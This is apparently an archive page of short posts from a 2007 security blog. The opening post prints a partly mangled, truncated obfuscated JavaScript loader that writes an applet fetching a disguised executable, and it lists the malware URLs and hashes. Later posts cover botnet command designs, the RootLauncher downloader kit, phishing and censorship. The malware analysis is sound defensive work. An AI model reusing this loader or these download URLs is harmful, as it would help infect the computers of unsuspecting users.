Shots from the Malicious Wild West - Sample One

Come to daddy. At _http://www.ms-counter.com we have an URL spreading malware through redirectors and the natural javascript obfuscation :

Input URL: _http://www.ms-counter.com/ms-counter/ms-counter.php?t=45
Effective URL: _http://www.ms-counter.com/ms-counter/ms-counter.php?t=45
Responding IP: 81.95.148.10
Name Lookup Time: 0.300643
Total Retrieval Time: 0.887313
Download Speed: 9878

Then we get the following :




var keyStr = "ABCDEFGHIJKLMNO"+"PQRSTUVWXYZabcdefghijk"+"lmnopqrstuvwx"
+"yz0123456789+/="; function decode64(input) { var output = ""; var chr2, chr3,
chr1; var enc4, enc2, enc1, enc3; var i = 0; input = input.replace(/[^A-Za-z0-9\
+\/\=]/g, ""); do { enc1 = keyStr.indexOf(input.charAt(i++)); enc2 = keyStr.index
Of(input.charAt(i++)); enc3 = keyStr.indexOf(input.charAt(i++)); enc4 = keyStr.
indexOf(input.charAt(i++)); chr1 = (enc1 <<>> 4); chr2 = ((enc2 & 15)
<<>> 2); chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.from
CharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); }
if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } while
(i < input.length); return output; } document.write(decode64("IDxhcHBsZXQgYXJjaGl2ZT0ibXMtY291bnRlci5q
YXIiIGNvZGU9IkJhYWFhQmFhLmNsYXNzIiB3aWR0aD0xIGhlaWdodD
0xPjxwYXJhbSBuYW1lPSJ1cmwiIHZhbHVlPSJodHRwOi8vbXMtY291b
nRlci5jb20vbXMtY291bnRlci9sb2FkLnBocCI+PC9hcHBsZXQ+PHNjcml
wdCBsYW5ndWFnZT0nam ETC. ETC. ETC.

Deobfuscating the javascript we get to see where the binary is :

Input URL: _http://ms-counter.com/mscounter/load.php
Effective URL: _http://ms-counter.com/mscounter/load.php
Responding IP: 81.95.148.10
Name Lookup Time: 0.211247
Total Retrieval Time: 1.065943
Download Speed: 12898

Server Response :
HTTP/1.1 200 OK
Date: Sat, 10 Mar 2007 00:49:27 GMT
Server: Apache
X-Powered-By: PHP/4.4.4
Content-Disposition: attachment; filename="codecs.exe"
Connection: close
Transfer-Encoding: chunked
Content-Type: application/exe

File info :
File size: 13749 bytes
MD5: f0778c52e26afde81dffcd5c67f1c275
SHA1: d61c6c17b78db28788f9a89c12b182a2b1744484

Running it over VT we get the following results you can see in the screenshot. It's obvious major AV software doesn't detect this one, but what you should keep in mind is the currently flawed signatures based malware detection approach. That's of course given someone's considering updating their AV software. In another analysis I'll come with another binary that all major AV vendors detect, but the second tier ones doesn't. Host based IPS based protection and behaviour blocking, and the actual prevention of loading the script is the way to avoid the exploitation of the flaws in signatures based scanning protection. Continue reading →

Envy These Women Please

Differentiating from the usual Most Powerful Women list, Forbes did a little niching to come up with a slideshow of women billionaires they envy most :

"Imagine for a moment what it would be like to be a billionaire. No more picking up after the kids, doing dishes, worrying about how much a dress costs or pinching pennies to save for an amazing vacation. For the women on Forbes' new list of the world's billionaires, that dream is a reality. But it's not just their 10-figure fortunes that make us envious. Some of these women are famous; some wield enormous power; some have fascinating careers. Some have all three."

Is it just me, or inherited wealth is boring right from the very beginning? The emergence of the spoon people, or so they say -- "Spoon feeding in the long run teaches us nothing but the shape of the spoon" Edward Morgan Forster. A week ago I participated in a discussion about power, most importantly one trying to define power and we ended up with several states of power - positional power, the C-level executives, expertise power, or the revenge of the underestimated walking case studies, and networking power. It's all a cyclical process like pretty much anything in life. Continue reading →

U.K's Latest Military Satellite System

The U.K military is about to upgrade their Skynet 4 satellite system to Skynet 5 :

"Four steerable antennas give it the ability to focus bandwidth on to particular locations where it is most needed - where British forces are engaged in operations. Its technologies have also been designed to resist any interference - attempts to disable or take control of the spacecraft - and any efforts to eavesdrop on sensitive communications. An advanced receive antenna allows the spacecraft to selectively listen to signals and filter out attempts to "jam" it."

Among the many features the new system introduces, two are worth mentioning - it's targeted bandwidth capability where it's needed and the sort of DENY:ALL upgraded receive antenna to avoid jamming. Now pray China won't take it down, or let the debris (conveniently) take care of the rest -- so vulnerable it makes you want to establish a space warfare code of conduct. Continue reading →

Armed Land Robots

After seeking to dominate the air, it's time defense contractors turn back to innovating on the ground, especially when we speak of armed and remotely controlled robots. Crucial for both, reconnaissance and guerilla warfare situations, movement flexibity as well as payload capacity is what adds more value to these robots. An Israeli based defense contractor Elbit Systems recently introduced The Viper :

"The Viper, which is about a foot long and weigh approximately five pounds, is powered by a special electrical engine and operated by remote control or according to a program implanted in its 'brain' in advance. It is capable of climbing stairs, getting past obstacles and at the same time checks what is going on around it by means of a system of sensors. Equipped with a special nine-millimeter caliber Uzi machine gun, on which a laser pointer has been installed. The Viper is carried to the battlefield by a soldier on his back in a special carrier. When it is necessary to infiltrate a building safely where, for example, armed terrorists are hiding, the soldier lowers it to the ground, turns it on and from that moment controls it from a distance."

I'm very interested in the possibility for a 360 degree view, it's noise generation level, the variety of terrains its supports, and most importantly - would it put itself back on its "feet" if it inevitably turns upside down. See, you wouldn't want your pricey attack toy acting like a cheap remotely controlled car toy, would you? Engadget has a photo of Viper.

Here's a recommended article on the history of armed aerial UAVs, as well as a recent story on beam energy weapons, the vomit beam in this case. Continue reading →

UK Telecoms Lack of Web Site Privacy

When the U.S and Canada are the benchmark it's logical to conclude the U.K gets poor ratings as web site privacy especially in the commercial sector is something the U.S and Canada tackled a long time ago. Taking the pragmatic perspective, does it really matter in times when government officials abuse commercially aggregated data, one they cannot legally obtain by themesleves, and so they ought to perform as paper-tigers to access it? Here's an interesting analysis :

"The U.K. industry, however, performed much worse in privacy. Telecom firms, especially in the U.K., ask for more personal data than companies in other industries. This data is often unconnected to the request being made by the customer.

U.K. sites are generally unclear about data sharing practices, with 23 per cent judged to be explicit compared to 69 per cent in the U.S. Clarity in this area has made steady gains in the U.S. in the past 12 months, but the U.K. has shown no significant change.

It is not only clarity that fails in the U.K., but also the actual practices in place. Eleven of the 13 sites routinely share personal data with other internal groups, business partners or third parties without explicit permission. This compared poorly with the U.S., where 40 per cent share in the same way. The best performing site with regards to privacy in the U.K. was O2."

Moreover, the U.K realizing its ongoing negative PR across the globe in respect to the CCTV surveillance myopia, they've released a report claiming Italy's COMINT is worse than their (walking) CCTV surveillance efforts. To publish a privacy policy or not to publish a privacy policy? That "used to be" the question. Continue reading →

Steganography Applications Hash Set

Did you know that there are over 600 applications capable of using steganography to hide data? Me neither, but here's a company that's innovating in the field of detecting such ongoing communication :

"Backbone Security’s Steganography Analysis and Research Center (SARC) is pleased to announce the release of version 3.0 of SAFDB. With the fingerprints, or hash values, of every file artifact associated with 625 steganography applications, SAFDB is the world’s largest commercially available hash set exclusive to digital steganography and other information hiding applications. The database is used by Federal, state and local law enforcement; intelligence community; and private sector computer forensic examiners to detect the presence or use of steganography and extract hidden information.

Version 3.0 contains hash values for each file artifact associated with the 625 steganography applications computed with the CRC-32, MD5, SHA-1, SHA-224, SHA-256, SHA-384, and SHA-512 algorithms.

A free extract of SAFDB with MD5 hashes only is available to qualifying law enforcement, government, and intelligence agency computer forensic examiners."

Chart courtesy of Huaiqing Wang and Shuozhong Wang. And here's a related post. Continue reading →

Distributed Computing with Malware

Distributed computing with malware infected PCs is nothing new as a concept, it's just the lack of botnet master's desire to contribute processing power for anything socially oriented. That's until late last month, when members of Berkeley's BOINC project noticed a project that was suspiciously becoming popular and found out that malware infected PCs had the BOINC client installed to participate in it :

"It recently came to the attention of boinc staff that a multi-project cruncher called Wate who occupied a very high position in the boinc and project stats had reached this exalted position by dishonest means. In early June 2006 he appears to to have released onto the internet a link purporting to provide Windows updates including now for Vista. Some 1500 members of the public worldwide downloaded these 'updates' which in fact consisted of a trojan application that downloaded boinc.exe and attached the person's computer to Wate's account, giving him the subsequent fraudulent credits. About 90% of the people affected appear to have uninstalled or disabled the unwanted boinc installation, but some compromised computers are still running and crashing climate models. Boinc and project staff have no means of contacting the owners of these computers."

If only would botnet masters take this note seriously, I'm sure we'll see certain networks controlling the top 10 positions at the BOINC project. A war on bandwidth or CPU power? Continue reading →

Documentary on ECHELON - The Spy System

Remember ECHELON? The über-secretive worldwide intelligence sharing network that various activists once tried to poison by generating fake suspicious traffic using predefined keywords? Well, the system is still operating, and with the lack of transparency in the participating country's use and abuse of the technology, all we need is an EU alternative competing with the original.

Watch this excellent half an hour long documentary and find out : "What exactly is Echelon? How can it invade privacy, yet protect liberty? How did this billion-dollar system miss the September 11th attacks? In a riveting hour, we uncover the mysterious, covert world of NSA's electronic espionage."

Continue reading →

USB Surveillance Sticks

Despite the ongoing awareness built among enterprises and end users on the risks posed by removable media, there are vendors offering various surveillance solutions over an USB stick. Some are handy, others contradictive. And while RFID tags are getting smaller than a crop of rice, here are three surveillance solutions to keep in mind right next to the notorious KeyGhost hardware keylogger.

SnoopStick
An example of malware on demand at $59.95 which comes with lots of features as well as automatic updates :

"The SnoopStick monitoring components are completely hidden, and there are no telltale signs that the computer is being monitored. You can then unplug the SnoopStick and take it with you anywhere you go. No bigger than your thumb and less than 1/4" thick, you can carry it in your pocket, purse, or on your keychain. Any time you want to see what web sites your kids or employees are visiting, who they are chatting with, and what they are chatting about, simply plug in your SnoopStick to any Windows based computer with an Internet connection and a USB port. SnoopStick will automatically connect to the target computer."

TrackStick
Portable GPS surveillance with historical routes that look simply amazing when applied at Google Earth :

"The Track Stick will work anywhere on the planet Earth. Using the latest in GPS mapping technologies, your exact location can be shown on graphical maps and 3D satellite images. The Track Stick's micro computer contains special mathematical algorithms, that can calculate how long you have been indoors. While visiting family, friends or even shopping, the Track Stick can accurately time and map each and every place you have been."

GadgetTrack
An interoperable surveillance solution supposed to assist you in case your iPod or even PSP get stolen, all you have to do is infect your device and prey there's Internet connectivity at a later stage. Tracking your stolen devices is one thing, getting them back is completely another :

"What if your device could phone home? Well now it can. With our patent-pending GadgetTrak™ system, you simply register your device and install our agent files on your device. If your device is missing or stolen, you log into your account and flag the device as lost or stolen. The next time the device is accessed it will attempt to contact us and provide data regarding the system it is plugged into." Continue reading →

Death is Just an Upgrade

Started as a project to digitally mimic 100% a human's behaviour, the Virtual Soldier research program is getting more funding to accomplish its mission, and go beyond :

"In particular, the contract calls for the VSR team to further develop their "Predictive Dynamics" tools for use in calculating human motion in a military environment. Invented by VSR researchers, the field of Predictive Dynamics already has made a significant impact on the field of human motion simulation by making it possible -- for the first time ever -- to calculate the walking and running involved in human gait when given such variables as human body size, strength, weight, load-carrying abilities and clothing effects."

Next, Santos will find himself exposed to radiation, blown up on pieces, getting hit by a truck, or pretty much anything that you would never get the chance to -- legally -- expose a living human to, for testing purposes. Continue reading →

Botnet Communication Platforms

Botnets, or the automated exploitation and management of malware infected PCs is perhaps the most popular and efficient cyber threat the Internet faces these days. Whether you define it as the war on bandwidth or who's commanding the largest infected population, this simple distributed hosts management problem is continuing to evolve in order for the botnet masters to remain undetected for as long as possible. On the other hand, the growing Internet population combined with the lack of awareness of the "just got a PC for Christmas" users, and IPv4's well known susceptability to IP spoofing compared to IPv6, always make the concept an interesting one to follow.

Despite that at the beginning of 2006, I pointed out on how malware related documentation and howtos turned into open source code resulting in a flood of malware variants, thus lowering the entry barries for a novice malware copycats, a week ago I located a very throughout document on various botnet communication platforms and I'm sure its author wouldn't mind me reposting the fancy graphs and commenting on them.

IRC based Botnet Communications
Nothing ground breaking in this one besides the various advices on stripping the IRCd, creating own network of IRC servers compared to using public ones, and on the importance of distributed secrecy of the botnet participants' IPs, namely each bot would never know the exact number or location of all servers and bots.

HTTP Botnet Communications
The possiblities with PHP and MySQL in respect to flexibility of the statistics, layered encryption and tunneling, and most importantly, decentralizing the command even improving authentication with port knocking are countless. Besides, with all the buzz of botnets continuing to use IRC, it's a rather logical move for botnet masters to shift to other platforms, where communicating in between HTTP's noise improves their chance of remaining undetected. Rather ironic, the author warns of possible SQL injection vulnerabilities in the botnet's command panel.

ICQ Botnet Communications
Perhaps among the main reasons to repost these graphs was the ICQ communication platform which I'll leave up to you to figure out. As a major weakness is listed the reliance on icq.com, but as we've already seen cases of botnets obtaining their commands by visiting an IRC channel and processing its topic, in this case it's ICQ WhiteLists getting the attention.

Related comments on the programming "know-how" discussed will follow. Know your Enemy!
Continue reading →

Real Time Censored URL Check in China

While the original initiative for a real-time URL censorship check in China was originally realized as a project by Jonathan Zittrain and Benjamin Edelman couple of years ago, it's great to see someone continued what they've started and came up with the GreatFirewallofChina.org :

"Aim of this website is to be a watchdog and keep track of which and how many or how many times sites are censored. Help to keep the censorship transparent. Each blocked website will automatically be added to the great firewall on the homepage."

What you should keep in mind is that despite of the capability for URL checking, from a technical perspective the censorship in China is much more sophisticated. Realizing that URLs themselves can be obfuscated, proxies and many other alternatives such as TOR for instance used, dynamic page content scanning for subversive keywords and the same technique used for sms messages is what I have in mind. For instance, according to the GreatFirewallofChina, blogspot.com is not blocked in the country, which doesn't mean a Taiwan independence related blog's content wouldn't get filtered. Moreover, it's perhaps even more disturbing to see various search results from a Chinese user's perspective, than figuring out whether an URL is blocked or not only. Here are two great screenshots confirming the twisted reality, and a recent summary of situation in China.

It would be great to see how this project evolves and starts taking presenting the results by confirming whether or not an URL is blocked in all of the countries on the world's censorship map, or ever better, start feeding local search engines with possibly censored keywords, summarize the results and emphasize on the big picture. Continue reading →

AdSense Click Fraud Rates

Google's single most profitable revenue generation source AdSense has always been under fire for click fraud and most importanly the company's been under public scrutiny for better communicating their efforts on fighting the problem. Third party companies emerged and started filling the niche by coming up with click fraud analytics software so that Google's major customers, even the small to mid-size business could take advantage of an automated way to analyze click anomalies. But how prelevant is the problem really? Should the discussion always orbit around Google's efforts, to its customers' vigilance and education on detecting click fraud, or should it shift to improving the communication between all participants, namely Google, its customers and the click auditing companies?

According to the most recent click fraud rate from Google - click fraud is only 0.002% of all clicks. Danny Sullivan has an in-depth analysis of the topic, emphasizing on the importance of detected click fraud rates :

"Finally, we have a click fraud rate from Google itself: less than 0.02 percent of all clicks slip past its filters and are caught after advertisers request reviews. That low figure is sure to bring out the critics who will disagree. Below, more about how Google comes up with the figure plus some click fraud fighting initiatives it plans to implement later this year.Why release this figure now, when many have wanted it for literally years?

"We've been working to be more transparent and informative on the issues related to click fraud. Recently, this metric has been something advertisers have specifically asked for and we agree that is useful in describing the scope of the problem. Further, it is something we measure and use to monitor the performance of our click fraud detection systems," said Shuman Ghosemajumder, business product manager for trust & safety at Google."

During July, 2006 Google commissioned a third-part analysis of their efforts to fight click fraud you will definitely find informative, and here's another research taking the discussion beyond the typical botnets and human clickers perspective. There are also false click fraud positives to keep in mind as shown in this analysis.

Stats courtesy of Clickfraudindex who by the way started blogging recently. Continue reading →

Social Engineering the Old Media

While the Rules of the Thirds are partly in place, the floating fragnance and his depressed look provide some clues. The story is very interesting though as it has happened before. As Tim Nudd comments on Adfreak :

"In Switzerland, it doesn’t take much to be in a Gucci ad campaign. You photograph yourself naked, add a perfume bottle and the Gucci logo, send it to a weekly paper, and have them bill Gucci directly for the $50,000. They’ll fall for it every time."

How it could have been prevented? Coordinating the campaign with local Gucci representatives, ensuring payment is processed before the ad is featured, or let's just say look at his face to figure out he's anything but a professional model. Continue reading →

Storm Worm Switching Propagation Vectors

The storm started with mass mailings, then the malware switched to IM propagation, and now the infected PCs are further spreading through blog and forum posts :

"But the twist comes when these people later post blogs or bulletin board notices. The software will insert into each of their postings a link to a malicious Web site, said Alperovitch, who rates the threat as "high."We haven't seen the Web channel used before," he said. "In the past, we've seen malicious links distributed to people in a user's address book and made to look like it's an instant message coming from them."

The smart thing is that compared to situations where malware authors have to figure how to bypass the forum's CAPTCHA or mass spam and generate new blogs, in this case the (infected) end user is authenticating both himself and the malware. Here are some malware stats on social networking sites worth going through as well.

UPDATE: Symantec has a nice analysis with some screenshots of this variant. Continue reading →

Credit Card Data Cloning Tactic

First of all, she's too cute for someone to even have the slightest suspicion, and to be honest the posers paying their coffee with a credit card deserve it -- it leaves them without the opportunity to leave a change at least that's what they've thought. Continue reading →

XSS Vulnerabilities in E-banking Sites

The other day I came across to this summary with direct examples of various XSS vulnerabilities at E-banking sites, and I wonder why the results still haven't gotten the necessary attention from the affected parties :

"First of all you should realize, that this is not the first time, that we are doing such a website. The last time we hit a vast number of sites, mostly german banks. We have shown, that those sites, that should be most secure are not! Many visitors saw the site and also the banks seemed quite upset, nevertheless they fixed the problems, that we pointed at. You can check out the archive at: [English version] and [German version]. This project has been done as a direct reaction to the poll done in austria not long ago and which was reported at [this article] from Heise. For the english readers of you, this article basically says, that 9 of 10 people using online banking in austria trust the security, that their banks offer."

The best phishing attack at least from a technical perspective is the one that's using a vulnerability in the targeted's brand site to further improve its truthfulness, and believe it or not, certain phishing attacks are actually loading images directly from the victim's sites instead of coming up with the phish creative on their own. Continue reading →

Fake Terror SMS Sent to 10,000 People

This is serious, and while it was a hoax, it could have had much more devastating results acting as a propagation vector for malware, a phishing attack as the social engineering potential here for anything offline or online is huge :

"About 10,000 commuters who subscribe to the train operator's timetable messaging service received the threatening text message on Friday night after hackers broke into the system. The message, sent after 9.30pm (AEDT), reads: ALLAHU AKBR FROM CONNEX! our inspectorS Love Killing people - if you see one coming, run. Want to bomb a train? they will gladly help. See you in hell!"

ALLAHU AKBR means "God is the Greatest". Now which God is the greatest I'll leave up to your religious beliefs, though the Muslim motives are spooky and the attack directly undermines the citizens' confidence in their government's ability to protect them -- what I anticipate next are articles on how terrorists take control over the trains. I'm very interested in who's having acccess to the company's feature, and most importantly to what extend are they outsourcing, or was it an insider that used someone else's terminal to send the message? Here's a related post on the interest of various governments into developing an SMS disaster alert and warning systems and the related security/impersonation problems to consider. Continue reading →

A Review of SiteAdvisor Pro

During 2006, the company popped out like a mushroom in front of my desktop as you can read in a previous post, and on its acquisition two months later. In the typical detailed and extensive CNET Reviews style, here's what they have to say about SiteAdvisor Plus :

"SiteAdvisor Plus includes the ability to report suspicious links within IM and e-mail and can automatically block access to flagged sites. However, SiteAdvisor Plus lacks additional configuration options and doesn't work with Firefox or Opera, or with branded browsers from AOL and other services. In addition, the paid version on Internet Explorer appears to conflict with the free version installed on Firefox. Overall, we experienced greater flexibility and fewer hassles when using the free Netcraft toolbar, and we also liked the proactive nature of Linkscanner Pro better."

The niche filling competition is also reviewed, namely LinkScanner Pro. Niche filling in respect to the real-time sandboxing of results, a concept I'm sure is on its way at SiteAdvisor, or else the community has a lot to contribute as always. SiteAdvisor are however truly embracing a Web 2.0 business model on all fronts, and it's perhaps my favorite case study on commercializing an academic idea during the last year. Continue reading →

Characteristics of Islamist Websites

Excellent and recent analysis of the most common characteristics of islamist websites published by the Middle East Media Research Institute :

"The media platform favored by the Islamist organizations is the Internet, which they prefer for several reasons: firstly, for the anonymity it allows - anyone can enter and post to a site without divulging personal information; secondly, due to the medium's availability and low cost - all that is required is a PC and an Internet connection; and thirdly, due to the ability to distribute material to a great number of people over a wide geographic area in a matter of seconds.

The organizations use the Internet mainly for propaganda and indoctrination, but also for operational military needs.

This paper will discuss the distinguishing characteristics of the websites of Islamist organizations and their supporters; the various online activities through which terrorist organizations assist the mujahideen on the ground, both militarily and, especially, with propaganda; and the Internet polemics that these organizations conduct vis-à-vis their enemies."

The majority of articles you've probably read are doing nothing more than scratching the surface of the topic. Fundraising, propaganda, communications within steganographic images and the use of plain simple encryption, or the thriller type of scenarious where entire food supply chains get remotely controlled or where your next dose of Prozac may be a little bit more dangerous than it actually is, of course because terrorists may have the capacity to do so. In the post 9/11 world terrorist experts started emerging from all over the globe, universities realizied the potential and opened up educational courses, even degrees, security companies started pitching their offers with cyberterrorism in mind, and last but not least the mainstream media doesn't seem to stop piggybacking on historical events while actually doing terrorists the biggest marketing favour of them all - the media echo effect. Someone blows him or herself up in the Western world, and everyone forgets about all those little things people die from if you are to go through you local statistical institute and see the death rates, but starts requesting more information on what is your government doing to prevent this from happening. But compared to the same situation in the Middle East - it's part of the daily life, nothing ground-breaking besides a bunch of low lifes radicalizing online, looking for masters of brainwashing mentors, and most importantly looking for a mighty excuse for their pathetic existence. A terrorist organization uploads a video of shooting a soldier or anything that will shock someone's who's still getting shocked by the The Texas Chainsaw Massacre -- boring try the Evil Dead series -- and people become so outraged and get this feeling of being helpness in the situation that fear compared to reality drives the entire model of terrorism.

Terrorism is successful as both, a government's doctrine for re-election, and as a term mainly because it's a very open topic term these days. In some countries glorifying terrorism is illegal, but if you let you government convince you that it's not terrorizing you to protect you from an event that from a statistical point of view doesn't happen that very often, I think I will lose you as a reader of this blog. The world is losing the war on terrorism because it's rational, and terrorists aren't rational. In the very same fashion that companies don't compete with companies but with networks, a network that's anything but irrational isn't going to be beated by a network that's too bureaucratic and still waging departamental wars.

Go through many of my previous posts on cyberterrorism, a relevant collection of cases, and through the research which as a matter of fact is full with practical examples of various sites. Continue reading →

The RootLauncher Kit

After providing more insights on the WebAttacker Toolkit and the Nuclear Grabber, in this post I'll discuss the RootLauncher, a release courtesy of the same group behind WebAttacker. Something else worth mentioning is that a large percentage of the sites I'm monitoring are starting to use authentication, and on a trust-basis login access, perhaps it's due to the enormous coverage recent "underground" releases, namely phishing kits etc. got in the mainstream media. Therefore I'm doing my best to get as much information -- and screenshots -- before it dissapears and will blog on these releases as soon as my schedule allows me to. For instance, several months ago you could easily see over 50 publicly available control panels for the WebAttacker toolkit, now there're only several available through Google. The same goes for RootLauncher.

The RootLauncher kit is advertised -- Rusian to English automatic translation -- as follows :

"Just, we can offer you 3-version - D o w n l o a d e r-designed RootLauncher for the hidden load arbitrary WIN32 Exe-faila from a remote resource, followed by the launch of the file on the local hard disk. Obhodit all protection is not determined by any AV-Do not see fairvollah - Flexible settings - Periodic updates and supplements may download up to five exe files. Our team is not at the same point and develops all bolshe-bolshe for you dear friends services available to them closer you will be able to on our official website. We are also looking for people interested in partnership with us."

And while it's supposed to be nothing more then an average downloader, these "average downloaders" are actually starting to standardize features in respect to statistics and compatibility with other toolkits and malicious software.

In a previous post at WebSense's blog, they came across a web panel showing that the "total number of unique launchers is 155" now count these as infected PCs, but as you can see in the image attached, the sample could be much larger. This one I obtained from the following URL : http://www.inthost7.com/cgi-bin/rleadmin.cgi which is of course down, but was listing 1013 launchers already, here's an analysis of this very same URL.

IP cloaking when browing such sites and forums is important in order for you to remain as anonymous as possible. If you're on a Russian site make sure you're a Russian domain, if you're on a Chinese site make sure you're a Chinese domain, and most importantly don't directly translate through Google or Altavista, but copy and paste what's interesting to you so that you wouldn't let someone wonder why would a Russian domain translates a Russian text to English. Imagine the situation where security vendors browse them through their securityvendor.com subdomains, the results will follow shortly -- everything dissapears.

In respect to the WebAttacker, the kit is still widely used but the people using and updating it are starting to prevent Google from crawling and caching the control panels, which makes it harder to keep track of the sites in an OSINT manner -- my modest honeyfarm keeps me informed on URLs of notice though. Here's one of the very few instances of a Web-Attacker Control Panel still available at Google. Here's an analysis of the source code of the Web-Attacker kit as well -- and I thought I'm going full disclosure. More details on various newly released packers, multi-exploit infection toolkits, and standardized statistics with all the screenshots I've managed to obtain will follow next week.

Taking into consideration the big picture -- like you should -- the release and automation of phishing/exploit kits and lowering the entry barriers for script kiddies to generate enough noise to keep the real puppet masters safe, or at lease secretly pull the strings. I'd rather we operate in the time when launching a phishing attack required much more resources than it requires today. Continue reading →

Image Blocking in Email Clients and Web Services

Handy graphs and best practices on the state of default remote image loading in desktop and online email clients -- a problematic issue from a security point of view, and a marketing heaven from an advertising perspective :

"Every client has its own default settings regarding displaying/hiding images. And while most email clients have a setting to turn images on or off, some offer conditional settings which are contingent upon known senders or other factors. The following table outlines the default settings of popular desktop- and webmail-clients."

Sometimes a spam email isn't sent with the idea to trick someone believe into something, but to act as a verification of that email's existence in the form of remote image -- web bug -- loading, and yes it could also act as a redirector to pretty much anything malicious. Go through related posts in case you're interested, and also see a common trade-off image spammers face. Continue reading →

Korean Zombies Behind the Root Servers Attack

More details on the recent DDoS attacks on the DNS root servers emerge, seems like the attacks originated from Sourth Korean infected PCs, but were orchestrated from a host server in Coburn, Germany :

"Citing data from the North American Network Operators' Group, the Korean government confirmed 61 percent of the problematic data was traced to South Korea. Yet, the Ministry of Information and Communication flatly rebuffs the suspicion that Korea was the main culprit behind the cyber attacks. ``We learned a host server in Coburg, Germany ordered a flurry of Korean computers to stage DOS assaults on the root servers,'' said Lee Doo-won, a director at the ministry. ``In other words, Korean computers affected by viruses made raids into the root servers as instructed by the German host server. Many of our computers acted like zombies,'' Lee said."

In a spoofable IPv4 Internet packet's authenticity is the most common flaw exploited on the front lines. The article points out that 61% of the problematic data came from South Korea, and it would be logical to conclude the other 39% came from Chinese and U.S based infected PCs, and while we can argue which country has the largest proportion of insecure end users -- or insecure end users with access to huge bandwidth -- that shouldn't be the point, but how ISPs should start considering how to stop the malicious traffic going out of their networks, compared to their current mindset of outside-to-inside network protection.

A battle lost for the botnet masters in their futile attempt to shut down three of the root servers, and a battle won for South Korea as they will definitely take this wake up call seriously. Meanwhile, S. Korea's CERT offers lots of interesting research reports on the local situation, particularly their latest Internet Incident Trend Report.

Graph courtesy of the ANA Spoofer Project. Continue reading →

The Phishing Ecosystem

Phishing is the efficient case of online social engineering. With the ease of sending phishing emails thanks to malware infected PCs -- spamonomics 101 -- as well as many other techniques for creating the pages and forwarders phishers use to trick users -- it's indisputable how much more profitable phishing is next to spam.

This is perhaps the most detailed summary of the emerging ecosystem I've read in a while. It walks the reader through the process of acquiring the resources for the attack and tracking down the results and provides overview of how malware authors, phishers and spammers work hand to hand due to the pressure put on their actions by the industry and, of course, the countless third-party researchers. Here's a summary :

"- Get an email list
- Develop the attack
- Locate sites to send phishing emails from
- Locate sites to host the phishing site
- Launch the attack
- Collect results"

Around the industry, security researchers are again signalling the ongoing use of popular sites such as MySpace for hosting phishing pages, phishers are going Web 2.0 and starting to use Google Maps, and seems like Castle Cops the anti-phishing community witnessed a demonstration of DDoS bandwidth power which is definitely the result of the consolidated anti-phishing initiative that they manage to keep on expanding. Moreover, yet another evidence of the developing ecosystem is the fact that spam and defaced sites aren't what they used to be, namely are turning into malicious attack vectors. Despite that everyone's claiming the commercialization of this entire ecosystem, hacktivism is not dead!

The "best" is yet to come, and let's hope a more suspicious common sense on the users' part too. Continue reading →

Cuba's Internet Dictatorship

And you thought people in China suffer from the lack of free speech expression. Here's the cheap version of the great firewall of China, this time in Cuba :

"Cuba built an Internet search engine that allows users to trawl through speeches by Cuban leader Fidel Castro and other government sites, but does not browse Web pages outside the island. Cubans cannot buy computers and Internet access is limited to state employees, academics and foreigners. Cubans line up for hours to send e-mails on post office terminals that cannot surf the World Wide Web. Passwords are sold on the black market allowing shared Internet use for limited hours, usually at night."

With Fidel Castro now seriously ill, the speeches will sooner or later turn into historical ones, the question is, which think-tank across the world would come closer in its predictions of the situation in a post-Castro Cuba next to reality? On the other hand the U.S is starving Cuba's bandwidth hunger to death, and considering their inability to invest in alternative sources for connectivity, the extend of degrading the quality of their Internet connectivity is almost unbeliavable as :

"Cuba is forced to use a costly satellite channel with only 65 megabytes per second (mbps) for upload and 124 mbps for download, he said."

Even a France Telecom customer that has upgraded service to Fiber@Home will be able to ping-to-death Cuba's entire academic community. And while Cuba recently blamed the CIA for digital espionage, it would take them unnecessary amount of time to download sensitive material remotely given Cuba's bandwidth capacity. Several other interesting events in case you remember were when Kyrgyzstan got cut off from Internet by hacker attack, and when Zimbabwe's Internet was shut down because they forgot the pay their bill. Bandwidth matters, depending on the perspective of course.

The most recent report on Censorship in Cuba is also worth going through :

"To visit websites or check their e-mail, Cubans have to use public access points such as Internet cafes, universities and “Youth computing centers” where it is easier to monitor their activity. Then, the Cuban police has installed software on all computers in Internet cafes and big hotels that triggers an alert message when “subversive” key-words are noticed."

The only way to undermine censorship is to talk about it -- and mock it. Continue reading →

Profiling Sergey Brin

Great weekend reading :

"Stepping through the sliding glass door into their office is like walking into a playroom for tech-savvy adults. A row of sleek flat-screen monitors lining one wall displays critical information: email, calendars, documents and, naturally, the Google search engine. Assorted green plants and an air purifier keep the oxygen flowing, while medicine balls provide appropriately kinetic seating. Upstairs, a private mezzanine with Astroturf carpeting and an electric massage chair afford Sergey and Larry a comfortable perch from which to entertain visitors and survey the carnival of innovation going on below. And there is ample space for walking around, which is absolutely essential for Sergey, who just can’t seem to sit still."

A story that proves for yet another time that nothing's impossible, the impossible just takes a little while. Here are some photos from Google's NYC headquarters, guess who likes to spoil its employees -- sorry Googlers -- most from all the tech companies these days? Say Google again! Continue reading →

Beyond Traditional Advertising Packages

Differentiate your value proposition or cease to exist. And hey, that's on Madison Avenue :

"As a startup carrier that hadn't yet hired a pilot, Virgin needed more than just slogans and 30-second commercials. That's about when Anomaly, a two-year-old startup, brought a pitch that sounded more like a takeover bid: Carl Johnson, Anomaly's 48-year-old co-founder, hauled out plans to design the interiors of Virgin's new A320s, fashion the flight attendants' uniforms, and create the content for a pay-per-view seat-back entertainment system."

You may also find the best and worst Super Bowl -- the U.S ad industry's favorite playground -- ads entertaining. Meanwhile, Pepsi is anticipating the DIY marketing culture and is asking everyone to help them build their next billboard on Times Square. When advertising does its job millions of people keep theirs, isn't it? Continue reading →

My Feed is on Fire, My Feed is on Fire!

I've never had so many people connected to me, perhaps it's the consequence of Feedburner detecting Google Readers as of this week, and yes the quality of the posts themselves. Here's an interesting opinion on the frequency of blog posting, I especially like the author's understanding of the readers' loyalty towards a blog. My ROI is still positive whatsoever -- part two of Forrester's series is also worth the read. Continue reading →

Delicious Information Warfare - Friday 16th

Here are some articles and blog posts worth reading plus the related comments. Previous summaries as well.

Islamic Terrorism from Clearguidance.com to Islamicnetwork.com -- very interesting reading regarding Daniel Joseph Maldonado, and a visionary quote "It takes a community to make a terrorist and it only take a handful of people to build and maintain such communities."

